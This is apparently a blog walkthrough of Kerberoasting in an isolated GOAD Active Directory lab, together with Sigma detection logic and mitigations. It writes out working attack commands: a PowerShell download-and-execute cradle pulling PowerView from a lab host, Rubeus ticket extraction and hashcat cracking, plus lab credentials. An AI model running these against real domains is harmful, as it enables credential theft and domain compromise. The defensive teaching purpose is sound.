Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab

Kerberoasting still kills domains in 2026 because teams keep spinning up Service Accounts with weak passwords and SPNs registered on DCs without enforced MFA. In our Game of Active Directory (GOAD v3) lab, it took roughly 14 minutes from an initial shell on a sevenkingdoms.local member box to cracking a SQL Server service account password with hashcat running on an RTX 4070. This post documents the full walkthrough, from PowerView enumeration to the Sigma rule that catches the attack inside the Blue Team's ELK stack. Everything is isolated, snapshotted, and nowhere near someone else's production.

Before touching GOAD, replicate the lab segmentation described in Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite so your network is properly isolated, and review OPSEC for Security Researchers: Building a Personal Threat Model to avoid leaking artifacts from your workstation. Our GOAD runs on three VMs with 6 GB RAM each (DC01, DC02, SRV02), plus a dedicated Kali with 8 GB on vmnet9. Use Mayfly277's official Ansible playbook, it provisions in around 45 minutes on a decent machine. Confirm the Windows firewall is permissive internally, otherwise you will be debugging RPC issues instead of studying Kerberos.

Enumeration starts after initial access. Assume you already grabbed low-priv credentials via techniques covered in Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab, in our case jaime.lannister:cersei. We load PowerView.ps1 with `IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerView.ps1')` and fire `Get-DomainUser -SPN | select samaccountname, serviceprincipalname`. Three accounts pop: sqlsvc, httpsvc, backupsvc. The natural target is sqlsvc, because MSSQL service accounts frequently started life with short passwords in 2018-era install scripts. Rubeus.exe is our capture tool: `Rubeus.exe kerberoast /nowrap /outfile:hashes.txt /user:sqlsvc`.

The returned TGS is encrypted with the NTLM hash of the service account password, encoded as RC4-HMAC (etype 23) in most labs and unfortunately in plenty of production. Grab hashes.txt, ship it to Kali via SMB or curl, and feed hashcat: `hashcat -m 13100 hashes.txt rockyou.txt -r rules/best64.rule`. At 2 minutes 11 seconds the password SQLSvc@2018 fell. If you want to flex bigger wordlists, OneRuleToRuleThemStill is solid, but start basic. To correlate with adjacent AD techniques, see Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus and especially Windows Persistence: 10 Documented Techniques and Their Countermeasures for what comes after this stage.

On the Blue Team side, Kerberoasting is not silent when you know where to look. Event ID 4769 on the DC logs every Service Ticket issued, and a Ticket Encryption Type of 0x17 (RC4) is already a yellow flag in modern environments with AES enabled. The Sigma rule I wrote watches 4769 with TicketEncryption 0x17 OR 0x18, groups by source user in a 60-second window, and fires when >=5 distinct SPNs are requested. That cuts noise from legitimate applications. For more on instrumentation, Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule shows how to stand up the pipeline with Filebeat and Elastic, and Hunting Living-off-the-Land Binaries on Windows with KQL covers adjacent detections for Defender for Identity.

Practical mitigation is layered. First, migrate every service account to Group Managed Service Accounts (gMSA) with automatic 30-day rotation, killing the useful offline-crack window. Second, force AES256_HMAC_SHA1 by clearing RC4 in the account's msDS-SupportedEncryptionTypes (value 0x18). Third, audit monthly with `Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties PasswordLastSet, msDS-SupportedEncryptionTypes` and flag any account whose password is older than 90 days. Fourth, enable Protected Users Group for any admin account that owns an SPN. For complementary endpoint hardening, Windows 11 Hardening for High-Risk Offensive Security Workstations covers the administrator workstation.

Practical takeaway: stand up a SIEM alert today that fires when a single account requests more than 4 distinct RC4 Service Tickets in 5 minutes, then cross-check it against an allowlist of expected service accounts. Two hours of work, and it would have caught 8 of every 10 real Kerberoasting attacks that appeared in public IR reports in 2025. Document the playbook, drill the team against the locally reproduced GOAD, and revisit posture every time a new SPN is created in the domain. Without that, your next headache may come from exactly this vector.